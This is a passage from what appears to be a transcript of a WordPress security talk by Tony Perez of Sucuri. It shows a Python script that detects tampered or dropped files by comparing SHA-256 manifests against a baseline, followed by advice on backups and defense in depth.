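    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root) -> dict:
    """Map every file under root (relative POSIX path) to its SHA-256."""
    root = Path(root)
    return {p.relative_to(root).as_posix(): sha256_file(p)
            for p in sorted(root.rglob("*")) if p.is_file()}


def diff_manifest(baseline: dict, current: dict) -> dict:
    return {
        "added": sorted(set(current) - set(baseline)),
        "removed": sorted(set(baseline) - set(current)),
        "modified": sorted(k for k in baseline.keys() & current.keys()
                           if baseline[k] != current[k]),
    }


def save_manifest(manifest: dict, path) -> None:
    # Keep this file outside the web root: an attacker who can write to the
    # site must not be able to rewrite the baseline as well.
    Path(path).write_text(json.dumps(manifest, indent=1, sort_keys=True))


def load_manifest(path) -> dict:
    return json.loads(Path(path).read_text())


def demo() -> dict:
    """Constructed document root: take a baseline, then simulate both incidents."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        site = root / "site"               # stands in for the WordPress document root
        (site / "wp-admin/includes").mkdir(parents=True)
        plugin_dir = site / "wp-content/plugins/all-in-one-seo-pack"
        plugin_dir.mkdir(parents=True)
        (site / "index.php").write_text("<?php require 'wp-blog-header.php';\n")
        (site / "wp-admin/includes/plugin.php").write_text("<?php // core library code\n")
        plugin_file = plugin_dir / "aioseop_class.php"
        plugin_file.write_text("<?php class All_in_One_SEO_Pack {}\n")

        save_manifest(build_manifest(site), root / "baseline.json")  # outside the site tree

        # Scenario One: plugin file modified in place.
        plugin_file.write_text("<?php class All_in_One_SEO_Pack {} /* injected code */\n")
        # Scenario Two: a file dropped into wp-admin/includes/.
        (site / "wp-admin/includes/list.php").write_text("<?php // dropped file placeholder\n")

        return diff_manifest(load_manifest(root / "baseline.json"), build_manifest(site))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=1))
```

Schedule the comparison from cron on a host that cannot be written to from the web tier, and re-baseline only after a deliberate update. A change report is only as good as the baseline it is compared against, which is why the manifest must live outside the document root and outside the reach of the pool user that serves the site.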
  • 36. If all else fails…
    o Be sure you have backups…
    o VaultPress – WordPress sites
    o Sucuri Backups – WordPress and everything else
    o SaaS-based backups are more effective!
  • 37. Tony Perez @perezbox | @sucuri_security | tony@sucuri.net | #wordsesh

Editor's Notes

  1. Defense in depth is a pretty standard phrase in the security world: there is no dependency on any one control, but rather a series of controls implemented throughout the stack to ensure integrity and security. It's simple and effective, yet many don't apply it, for whatever reason. We're too busy focusing on that quick solution that will end all my problems, that one plugin that will harden my entire site to the point where I won't be able to access it and none of my plugins will work.
  2. Be sure to check out Jason Cosper's presentation from earlier this evening; it should be up on WordSesh soon. He goes through some good tips on hardening your WordPress site.